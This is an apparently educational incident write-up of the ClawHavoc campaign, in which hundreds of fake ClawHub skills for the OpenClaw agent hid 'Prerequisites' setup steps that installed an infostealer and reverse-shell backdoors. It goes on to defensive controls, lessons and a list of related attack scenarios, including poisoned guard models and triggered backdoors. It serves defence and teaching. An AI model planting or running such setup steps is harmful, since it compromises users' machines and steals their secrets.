ClawHavoc — mass poisoning of OpenClaw's ClawHub agent-skill marketplace
Real-world incident01 Feb 2026🗺️ Tool-Using AgentAttackers flooded ClawHub — the skill marketplace for the popular OpenClaw AI agent — with at least 341 malicious 'skills' that tricked agents/users into installing the Atomic macOS Stealer and reverse-shell backdoors.
Root cause — why it happened
The OpenClaw agent gets new abilities by installing community 'skills' from an online store called ClawHub — much like adding apps to a phone. People pick a skill by its name, its polished description and its apparent popularity. Attackers flooded that store with hundreds of fake skills dressed up as useful tools. Each one's instructions included a 'before you can use this' setup step that told the user (or their agent) to run a command or open a password-protected file. That step quietly installed data-stealing malware and a hidden remote-control backdoor, then shipped the victim's secrets off to the attacker. The core problem isn't that the AI was tricked by clever words inside a document — it's that the marketplace let anyone publish a skill with no real proof of who made it, and nothing checked the 'setup' command before a human was nudged into running it on their own machine.
Risks this case illustrates
Named in the standard (OWASP/ATLAS/NIST) lens. Click a highlighted component in the diagram below to see which risks attach where.
How it unfolded
Attackers flood the marketplace with fake skills
OpenClaw is a hugely popular open-source AI agent, and it gets new powers by installing community 'skills' from a store called ClawHub. Anyone can publish a skill there. Attackers took advantage of that: starting in late January 2026 they uploaded a flood of fake skills, each one polished to look like a genuinely useful tool, with a professional description to win trust. The store had no real way to prove who made each skill.
ClawHub > Skills > productivity
fast-notes-sync ★★★★☆ (impersonates a real utility)
"Sync your notes across devices from OpenClaw. Trusted by thousands."
publisher: not verified signature: none downloads: (inflated)
[+] Install [ View source ] [ Report ]
# Catalog metadata looks clean. No signed authorship. Payload is in the docs.
# ≥341 such listings found among ~2,857 live skills; 335 one campaign.Controls & guardrails — what would have stopped it
Two things break this chain. First, make the marketplace prove who made each skill — signed by a known publisher and reviewed — so attackers can't flood it with hundreds of fakes that ride on fake popularity. Second, treat a skill's 'setup step' as dangerous by default: never auto-run it, run it in a locked-down sandbox, and make a human approve anything that wants to execute code or phone home. Together, a fake 'prerequisite' command has nowhere to detonate. Filtering the skill's description wouldn't help — the trap was in human-facing instructions, and the harm ran outside the AI entirely.
- Provenance & content signing
Provenance proves origin, not safety; a trusted source can still be wrong or compromised. Requires discipline to propagate metadata end to end.
- MCP/plugin pinning, manifest hashing & re-reviewaddressesSupply-Chain Compromise
Review catches what reviewers understand; a subtle malicious directive can pass. Pinning helps only if you actually re-review on update rather than auto-accepting.
- Human-in-the-loop approval on high-risk actions
Approval fatigue turns gates into rubber stamps; gates placed after the point of no return do nothing; and approvers can be misled by a model-written summary of the action.
- Egress allowlisting & DLP on tool arguments
Allowlists fight an open-ended channel; legitimate-but-broad destinations (any URL fetch, any email) are hard to constrain without breaking usefulness. Encoding can evade naive DLP.
- Least-privilege identity & scoped credentials
Doesn't prevent manipulation — only caps its reach. Hard to get right operationally; over-broad scopes are the common real-world failure.
- User AI-literacy & verification workflows
Relies on human diligence under time pressure; automation bias is strong and training decays. A backstop, not a guarantee.
- Runtime monitoring & anomaly detection
Detects the anomalous, not the novel-but-subtle; high false-positive rates cause alert fatigue. Always a step behind a sufficiently quiet attacker.
- Full-trace audit logging
Logging is forensic, not preventive — it explains harm after the fact. Useless if no one reviews it or if the materialised context isn't captured.
- Governance: risk assessment, red-teaming & incident response
Process reduces likelihood and speeds recovery but executes no technical control itself; weak follow-through makes it theatre.
- Loop/cost circuit-breakers & consistency checks
Thresholds are blunt — too tight breaks legitimate long tasks, too loose lets damage accrue first. Catches runaway dynamics, not a single well-formed bad decision.
Lessons
- ▸ The capability marketplace is the agentic supply-chain attack surface: poisoning the store that provisions agent 'skills' turns an ordinary 'install a skill' workflow into mass host compromise (≥341 malicious skills; 335 one campaign 'ClawHavoc').
- ▸ Reputation is forgeable; provenance is the boundary. ClawHub selected skills by name/description/popularity with no signed authorship, so a coordinated actor sybil-published hundreds of lookalikes that looked legitimate.
- ▸ The harm hid in human-facing docs, not in tool code the model runs. A ClickFix 'Prerequisites' step (obfuscated script / password-protected ZIP) converts a documentation read into local RCE — so description filters and agent-call validation never see it.
- ▸ Treat a skill's setup command as untrusted code: never auto-run 'prerequisites', sandbox install-time execution, and require human approval for any code-exec or egress — the installer-execution gate is the missing control here.
- ▸ Agent telemetry is blind to this class: the compromise runs outside the agent, as the user. Detection must live at the host and egress layers (new stealer/reverse-shell processes, anomalous C2) and in artifact review (password-ZIPs, obfuscation as AV-evasion tells).
- ▸ Counts grow as analysis deepens: figures rose from at least 341 toward 1,000+ (Trend Micro, Snyk, Antiy). Cite point-in-time numbers as 'at least 341 / 335-campaign' and attribute later totals to follow-up analysis.
Sources
- ClawHavoc: 341 Malicious Skills Found by the Bot They Were Targeting — Koi Security ↗
- Researchers Find 341 Malicious ClawHub Skills Stealing Data from OpenClaw Users — The Hacker News ↗
- OpenClaw agents targeted with 341 malicious ClawHub skills — SC Media ↗
- Koi Security — ClawHavoc: 341 Malicious Skills Found by the Bot They Were Targeting (primary) ↗ — Oren Yomtov; audit of all ~2,857 live skills (with his OpenClaw assistant 'Alex'); ≥341 malicious, 335 one campaign named ClawHavoc; ClickFix 'Prerequisites' steps dropping AMOS / Windows infostealers / reverse shells; disclosed 1 Feb 2026.
- The Hacker News — Researchers Find 341 Malicious ClawHub Skills Stealing Data from OpenClaw Users ↗ — Confirms the count, the marketplace-poisoning mechanism, and the Atomic macOS Stealer / infostealer / reverse-shell payloads; counts later expanded toward 1,000+ by follow-up analysis.
- SC Media — OpenClaw agents targeted with 341 malicious ClawHub skills ↗ — Independent reporting on the campaign, the skill-marketplace supply-chain vector, and skill takedown.
Practise the risk class — related scenarios
Compromise the pipeline that builds agents, and every new worker is born malicious
The safety guard is itself a trained model — and someone poisoned its lessons
A cost-saving open-weights swap quietly ships a model with its safety surgically removed
A capable third-party model that behaves perfectly — until it sees the trigger
A trusted MCP email tool quietly BCCs every message to an attacker
A forged peer registers on the agent directory — and the planner enlists it